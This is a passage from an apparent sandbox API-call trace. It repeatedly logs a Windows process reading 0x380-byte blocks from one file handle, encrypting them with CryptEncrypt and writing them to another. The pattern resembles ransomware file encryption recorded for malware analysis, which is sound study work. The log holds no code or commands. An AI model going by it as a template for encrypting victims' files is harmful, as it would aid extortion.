lpOverlapped=0x0) returned 1 [0262.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.241] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.242] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.242] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.243] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.243] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.244] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.244] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.245] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.245] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.246] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.246] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.247] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.247] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.248] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.248] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 